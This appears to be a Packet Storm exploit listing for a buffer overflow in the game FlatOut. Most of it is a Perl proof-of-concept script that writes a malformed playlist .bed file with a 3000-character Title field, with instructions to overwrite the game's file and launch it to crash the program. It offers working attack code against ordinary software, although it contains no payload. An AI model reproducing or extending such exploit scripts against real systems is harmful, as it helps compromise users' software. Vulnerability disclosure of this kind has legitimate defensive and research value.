Bugbear FlatOut 2005 Buffer Overflow

2011-11-30T00:00:00
ID PACKETSTORM:107403
Type packetstorm
Reporter Silent Dream
Modified 2011-11-30T00:00:00

Description

                                        
                                            `#Exploit Title: FlatOut Malformed .bed file Buffer Overflow  
# Date: 11-29-11  
# Author: Silent Dream  
# Software Link: http://www.gog.com/en/gamecard/flatout  
# Version: Latest  
# Tested on: Windows 7  
  
#Tested on GOG.com copy of FlatOut. Exception offset = 61616161  
#Multiple .bed files are vulnerable to buffer overflows...too many to even begin to list..  
  
my $file = "playlist_0.bed";  
my $head = "Title = \"";  
my $junk = "a" x 3000 . "\"\r";  
my $tail = "Loop = {" . "\r}";  
open($File, ">$file");  
print $File $head.$junk.$tail;  
close($FILE);  
print "Overwrite the original playlist_0.bed file in %program files%\\GOG.com\\FlatOut\\data\\music and launch flatout.exe...wait for the crash\r\n";  
  
`